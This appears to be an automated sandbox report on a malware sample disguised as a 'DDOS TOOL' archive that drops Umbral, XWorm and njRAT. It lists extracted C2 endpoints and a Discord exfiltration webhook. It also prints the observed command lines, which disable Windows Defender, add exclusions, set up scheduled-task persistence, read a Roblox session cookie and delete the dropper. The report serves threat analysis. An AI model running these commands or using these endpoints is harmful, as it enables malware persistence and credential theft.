Analysis
-
max time kernel
28s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
01-12-2024 16:35
Static task
static1
Behavioral task
behavioral1
Sample
DDOS TOOL.rar
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
DDOS TOOL.rar
Resource
win10v2004-20241007-en
General
-
Target
DDOS TOOL.rar
-
Size
5.2MB
-
MD5
01abc57a648bfe6c15d0e60cee8df24d
-
SHA1
6879b1d3f182d046297a5a51e4629ac79e8eb9bb
-
SHA256
cc955efc8aaa3c26caa9b57604ee3bb2aa4039b946b8c2aea8e7d2579dab18c7
-
SHA512
9776436a6f4d0a61ee92d12955263ab6a7d40e86e79929956af8e314cb34a262e32efc46a2f11d09815dc8ed64d1fdda62cc42bcb526dc8dad2c5fb4ae0002e6
-
SSDEEP
98304:c+D78yvHmfPHf5ra0SobmnJolavV9sR/1ZfoW5Uxx5gw:c+TPE5rT6nKlS9E9a5gw
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1260642913709199370/cN_Wnccw0kdFSTwqONW2fMDnifHoEhjQp9n_8tPGu3gI5coO14fm3gGZ1Q04Hstg1nAO
Extracted
xworm
5.0
testarosa.duckdns.org:7110
5ZpeoOe6AtQfr6wU
-
Install_directory
%AppData%
-
install_file
Ondrive.exe
Extracted
njrat
0.7d
HacKed
147.185.221.20:49236
6a8a3b6e5450a823d542e748a454aa4c
-
reg_key
6a8a3b6e5450a823d542e748a454aa4c
-
splitter
|'|'|
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x00070000000186f1-20.dat family_umbral behavioral1/memory/2852-23-0x0000000000CD0000-0x0000000000D10000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0006000000018739-38.dat family_xworm behavioral1/memory/2912-50-0x00000000002D0000-0x00000000002E0000-memory.dmp family_xworm -
Njrat family
-
Umbral family
-
Xworm family
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2580 powershell.exe 1624 powershell.exe 2704 powershell.exe 1976 powershell.exe 1508 powershell.exe 1112 powershell.exe 1208 powershell.exe 1700 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
HYDRA.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts HYDRA.exe -
Executes dropped EXE 8 IoCs
Processes:
DDOS TOOL.exeServer.exeHYDRA.exeServer.exeDDoS_Tool.execonhost.exeDDoS_Tool.exeserver.exepid Process 2632 DDOS TOOL.exe 1968 Server.exe 2852 HYDRA.exe 332 Server.exe 2728 DDoS_Tool.exe 2912 conhost.exe 1588 DDoS_Tool.exe 2836 server.exe -
Loads dropped DLL 10 IoCs
Processes:
DDOS TOOL.exeDDoS_Tool.exeDDoS_Tool.exeServer.exepid Process 2632 DDOS TOOL.exe 2728 DDoS_Tool.exe 1588 DDoS_Tool.exe 1588 DDoS_Tool.exe 1588 DDoS_Tool.exe 1588 DDoS_Tool.exe 1588 DDoS_Tool.exe 1588 DDoS_Tool.exe 1588 DDoS_Tool.exe 332 Server.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0006000000018704-33.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Server.exeserver.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2208 cmd.exe 3060 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
conhost.exepid Process 2912 conhost.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
7zFM.exeHYDRA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2360 7zFM.exe 2360 7zFM.exe 2852 HYDRA.exe 1208 powershell.exe 1700 powershell.exe 1976 powershell.exe 2580 powershell.exe 1508 powershell.exe 1112 powershell.exe 1624 powershell.exe 2624 powershell.exe 2360 7zFM.exe 2360 7zFM.exe 2704 powershell.exe 2360 7zFM.exe 2360 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid Process 2360 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exeHYDRA.execonhost.exeDDoS_Tool.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid Process Token: SeRestorePrivilege 2360 7zFM.exe Token: 35 2360 7zFM.exe Token: SeSecurityPrivilege 2360 7zFM.exe Token: SeDebugPrivilege 2852 HYDRA.exe Token: SeDebugPrivilege 2912 conhost.exe Token: 35 1588 DDoS_Tool.exe Token: SeIncreaseQuotaPrivilege 2752 wmic.exe Token: SeSecurityPrivilege 2752 wmic.exe Token: SeTakeOwnershipPrivilege 2752 wmic.exe Token: SeLoadDriverPrivilege 2752 wmic.exe Token: SeSystemProfilePrivilege 2752 wmic.exe Token: SeSystemtimePrivilege 2752 wmic.exe Token: SeProfSingleProcessPrivilege 2752 wmic.exe Token: SeIncBasePriorityPrivilege 2752 wmic.exe Token: SeCreatePagefilePrivilege 2752 wmic.exe Token: SeBackupPrivilege 2752 wmic.exe Token: SeRestorePrivilege 2752 wmic.exe Token: SeShutdownPrivilege 2752 wmic.exe Token: SeDebugPrivilege 2752 wmic.exe Token: SeSystemEnvironmentPrivilege 2752 wmic.exe Token: SeRemoteShutdownPrivilege 2752 wmic.exe Token: SeUndockPrivilege 2752 wmic.exe Token: SeManageVolumePrivilege 2752 wmic.exe Token: 33 2752 wmic.exe Token: 34 2752 wmic.exe Token: 35 2752 wmic.exe Token: SeIncreaseQuotaPrivilege 2752 wmic.exe Token: SeSecurityPrivilege 2752 wmic.exe Token: SeTakeOwnershipPrivilege 2752 wmic.exe Token: SeLoadDriverPrivilege 2752 wmic.exe Token: SeSystemProfilePrivilege 2752 wmic.exe Token: SeSystemtimePrivilege 2752 wmic.exe Token: SeProfSingleProcessPrivilege 2752 wmic.exe Token: SeIncBasePriorityPrivilege 2752 wmic.exe Token: SeCreatePagefilePrivilege 2752 wmic.exe Token: SeBackupPrivilege 2752 wmic.exe Token: SeRestorePrivilege 2752 wmic.exe Token: SeShutdownPrivilege 2752 wmic.exe Token: SeDebugPrivilege 2752 wmic.exe Token: SeSystemEnvironmentPrivilege 2752 wmic.exe Token: SeRemoteShutdownPrivilege 2752 wmic.exe Token: SeUndockPrivilege 2752 wmic.exe Token: SeManageVolumePrivilege 2752 wmic.exe Token: 33 2752 wmic.exe Token: 34 2752 wmic.exe Token: 35 2752 wmic.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeIncreaseQuotaPrivilege 2264 wmic.exe Token: SeSecurityPrivilege 2264 wmic.exe Token: SeTakeOwnershipPrivilege 2264 wmic.exe Token: SeLoadDriverPrivilege 2264 wmic.exe Token: SeSystemProfilePrivilege 2264 wmic.exe Token: SeSystemtimePrivilege 2264 wmic.exe Token: SeProfSingleProcessPrivilege 2264 wmic.exe Token: SeIncBasePriorityPrivilege 2264 wmic.exe Token: SeCreatePagefilePrivilege 2264 wmic.exe Token: SeBackupPrivilege 2264 wmic.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid Process 2360 7zFM.exe 2360 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7zFM.exeDDOS TOOL.exeServer.exeDDoS_Tool.exeDDoS_Tool.exeHYDRA.execonhost.exedescription pid Process procid_target PID 2360 wrote to memory of 2632 2360 7zFM.exe 31 PID 2360 wrote to memory of 2632 2360 7zFM.exe 31 PID 2360 wrote to memory of 2632 2360 7zFM.exe 31 PID 2632 wrote to memory of 1968 2632 DDOS TOOL.exe 32 PID 2632 wrote to memory of 1968 2632 DDOS TOOL.exe 32 PID 2632 wrote to memory of 1968 2632 DDOS TOOL.exe 32 PID 2632 wrote to memory of 2852 2632 DDOS TOOL.exe 33 PID 2632 wrote to memory of 2852 2632 DDOS TOOL.exe 33 PID 2632 wrote to memory of 2852 2632 DDOS TOOL.exe 33 PID 1968 wrote to memory of 332 1968 Server.exe 34 PID 1968 wrote to memory of 332 1968 Server.exe 34 PID 1968 wrote to memory of 332 1968 Server.exe 34 PID 1968 wrote to memory of 332 1968 Server.exe 34 PID 2632 wrote to memory of 2728 2632 DDOS TOOL.exe 35 PID 2632 wrote to memory of 2728 2632 DDOS TOOL.exe 35 PID 2632 wrote to memory of 2728 2632 DDOS TOOL.exe 35 PID 1968 wrote to memory of 2912 1968 Server.exe 36 PID 1968 wrote to memory of 2912 1968 Server.exe 36 PID 1968 wrote to memory of 2912 1968 Server.exe 36 PID 2728 wrote to memory of 1588 2728 DDoS_Tool.exe 38 PID 2728 wrote to memory of 1588 2728 DDoS_Tool.exe 38 PID 2728 wrote to memory of 1588 2728 DDoS_Tool.exe 38 PID 1588 wrote to memory of 1528 1588 DDoS_Tool.exe 39 PID 1588 wrote to memory of 1528 1588 DDoS_Tool.exe 39 PID 1588 wrote to memory of 1528 1588 DDoS_Tool.exe 39 PID 1588 wrote to memory of 868 1588 DDoS_Tool.exe 40 PID 1588 wrote to memory of 868 1588 DDoS_Tool.exe 40 PID 1588 wrote to memory of 868 1588 DDoS_Tool.exe 40 PID 1588 wrote to memory of 2992 1588 DDoS_Tool.exe 41 PID 1588 wrote to memory of 2992 1588 DDoS_Tool.exe 41 PID 1588 wrote to memory of 2992 1588 DDoS_Tool.exe 41 PID 2852 wrote to memory of 2752 2852 HYDRA.exe 42 PID 2852 wrote to memory of 2752 2852 HYDRA.exe 42 PID 2852 wrote to memory of 2752 2852 HYDRA.exe 42 PID 2912 wrote to memory of 1208 2912 conhost.exe 45 PID 2912 wrote to memory of 1208 2912 conhost.exe 45 PID 2912 wrote to memory of 1208 2912 conhost.exe 45 PID 2852 wrote to memory of 2140 2852 HYDRA.exe 47 PID 2852 wrote to memory of 2140 2852 HYDRA.exe 47 PID 2852 wrote to memory of 2140 2852 HYDRA.exe 47 PID 2852 wrote to memory of 1700 2852 HYDRA.exe 49 PID 2852 wrote to memory of 1700 2852 HYDRA.exe 49 PID 2852 wrote to memory of 1700 2852 HYDRA.exe 49 PID 2912 wrote to memory of 1976 2912 conhost.exe 51 PID 2912 wrote to memory of 1976 2912 conhost.exe 51 PID 2912 wrote to memory of 1976 2912 conhost.exe 51 PID 2852 wrote to memory of 2580 2852 HYDRA.exe 53 PID 2852 wrote to memory of 2580 2852 HYDRA.exe 53 PID 2852 wrote to memory of 2580 2852 HYDRA.exe 53 PID 2912 wrote to memory of 1508 2912 conhost.exe 55 PID 2912 wrote to memory of 1508 2912 conhost.exe 55 PID 2912 wrote to memory of 1508 2912 conhost.exe 55 PID 2912 wrote to memory of 1112 2912 conhost.exe 57 PID 2912 wrote to memory of 1112 2912 conhost.exe 57 PID 2912 wrote to memory of 1112 2912 conhost.exe 57 PID 2852 wrote to memory of 1624 2852 HYDRA.exe 59 PID 2852 wrote to memory of 1624 2852 HYDRA.exe 59 PID 2852 wrote to memory of 1624 2852 HYDRA.exe 59 PID 2852 wrote to memory of 2624 2852 HYDRA.exe 61 PID 2852 wrote to memory of 2624 2852 HYDRA.exe 61 PID 2852 wrote to memory of 2624 2852 HYDRA.exe 61 PID 2912 wrote to memory of 2664 2912 conhost.exe 63 PID 2912 wrote to memory of 2664 2912 conhost.exe 63 PID 2912 wrote to memory of 2664 2912 conhost.exe 63 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\DDOS TOOL.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\7zO83955FC6\DDOS TOOL.exe"C:\Users\Admin\AppData\Local\Temp\7zO83955FC6\DDOS TOOL.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:332 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2836
-
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:2664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"4⤵
- Views/modifies file attributes
PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HYDRA.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2916
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:1936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:1744
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\HYDRA.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2208 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe"C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe"C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c title DDoS Tool by HʎDRΔ5⤵PID:1528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:2992
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD54356e6504e19b8a4014dbfacbc89493f
SHA1a4078eabcc6760e184259d694b7251b89569453a
SHA256e3a9ffb17c734d02950cdfcd38592549181d9f95220b8aaae69d6091480a8d42
SHA51283949b7422c6e2efcf6888e5c324ee8d536716f571156bdb4672e989aa68a1be5b7e6f0b5024e7c47af3f16ef0667045fda050f5dbc1272a491febdd249b7fe3
-
Filesize
227KB
MD5224f803df5b876b23c002f19f74aafac
SHA16b265b9921fed98a4d3b9a8e72f26914ed154de8
SHA256f8d8aa95aa4205ac48cf654af602563bef92848b92129b07c5f402816d3d04dc
SHA5122df0cd2db55fce534ac6b65afacc121c21b5c105d24d2c6c036b5225e86e97833b2281f205b1435e2c1800ddeeb0f597d0a0fdf83887421259043402487c43b2
-
Filesize
71KB
MD5f9b08bd21b40a938122b479095b7c70c
SHA1eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee
-
Filesize
87KB
MD50e675d4a7a5b7ccd69013386793f68eb
SHA16e5821ddd8fea6681bda4448816f39984a33596b
SHA256bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66
-
Filesize
129KB
MD52f21f50d2252e3083555a724ca57b71e
SHA149ec351d569a466284b8cc55ee9aeaf3fbf20099
SHA25609887f07f4316057d3c87e3a907c2235dc6547e54ed4f5f9125f99e547d58bce
SHA512e71ff1e63105f51a4516498cd09f8156d7208758c5dc9a74e7654844e5cefc6e84f8fe98a1f1bd7a459a98965fbe913cb5edb552fffa1e33dfda709f918dddeb
-
Filesize
38KB
MD5c3b19ad5381b9832e313a448de7c5210
SHA151777d53e1ea5592efede1ed349418345b55f367
SHA256bdf4a536f783958357d2e0055debdc3cf7790ee28beb286452eec0354a346bdc
SHA5127f8d3b79a58612e850d18e8952d14793e974483c688b5daee217baaa83120fd50d1e036ca4a1b59d748b22951744377257d2a8f094a4b4de1f79fecd4bf06afb
-
Filesize
74KB
MD5d7e7a7592338ce88e131f858a84deec6
SHA13add8cd9fbbf7f5fa40d8a972d9ac18282dcf357
SHA2564ba5d0e236711bdcb29ce9c3138406f7321bd00587b6b362b4ace94379cf52d5
SHA51296649296e8ccdc06d6787902185e21020a700436fc7007b2aa6464d0af7f9eb66a4485b3d46461106ac5f1d35403183daa1925e842e7df6f2db9e3e833b18fb4
-
Filesize
766KB
MD5c7f6b1e71737274de654099f1a483896
SHA16cf5965a8efb64443dc654c6b9953eacb314daca
SHA256d982c24bbc242b3cc0094ee3685fba79297f3893d354293d4c33ccfd431dfb1d
SHA5123b196ecb376f02b900b581d98d347d22d89d34b502a46770493663e48f9d7eee4b42acb16181b441026ae1634638faa14e4ebd814e05ccaf2b965aa2a5b5179c
-
Filesize
2.4MB
MD5022a61849adab67e3a59bcf4d0f1c40b
SHA1fca2e1e8c30767c88f7ab5b42fe2bd9abb644672
SHA2562a57183839c3e9cc4618fb1994c40e47672a8b6daffaa76c5f89cf2542b02c2f
SHA51294ac596181f0887af7bf02a7ce31327ad443bb7fe2d668217953e0f0c782d19296a80de965008118708afd9bda14fd8c78f49785ebf7abcc37d166b692e88246
-
Filesize
3.7MB
MD562125a78b9be5ac58c3b55413f085028
SHA146c643f70dd3b3e82ab4a5d1bc979946039e35b2
SHA25617c29e6188b022f795092d72a1fb58630a7c723d70ac5bc3990b20cd2eb2a51f
SHA512e63f4aa8fc5cd1569ae401e283bc8e1445859131eb0db76581b941f1085670c549cbc3fedf911a21c1237b0f3f66f62b10c60e88b923fa058f7fafee18dd0fa4
-
Filesize
26KB
MD5c30e5eccf9c62b0b0bc57ed591e16cc0
SHA124aece32d4f215516ee092ab72471d1e15c3ba24
SHA25656d1a971762a1a56a73bdf64727e416ffa9395b8af4efcd218f5203d744e1268
SHA5123e5c58428d4c166a3d6d3e153b46c4a57cca2e402001932ec90052c4689b7f5ba4c5f122d1a66d282b2a0a0c9916dc5a5b5e5f6dfc952cdb62332ac29cb7b36a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51399bbf0a60f05f3395ea9d77bbb5e82
SHA1f1b98fd39183b4d3bfcece37116a1bd3492f2852
SHA256eacc54213ec24a72fb0c814e6fd865584b98e5658486544be48f5b0b72106ec3
SHA51279672157ed0eb007653565fe9f310e02cc3c260761833a821d02af78cebd035d80e798b02142594fe4f59964e0f97a609e0c98641c4c0eb900572eaeafb29d76
-
Filesize
23KB
MD532fe01ccb93b0233503d0aaaa451f7b2
SHA158e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA2566988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA51276945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6
-
Filesize
37KB
MD5b37dd1a1f0507baf993471ae1b7a314c
SHA19aff9d71492ffff8d51f8e8d67f5770755899882
SHA256e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
5.2MB
MD50b119327f1046d6917d7018312ac8e32
SHA13562ca03b61381ba727d8dac8da7bd24647eb9fc
SHA2568adadd0edb3da0a3bebce706c8f8acd4a07c77abdf7e66c712fb61189a5c81ed
SHA512dc087ba8e9603533bc780906b34f350728bda86c980e47fa9eaa1bf77baf4c4df75af514135665f99f99e4d475ed512a415ed756b30bae39e29813ca49ae3391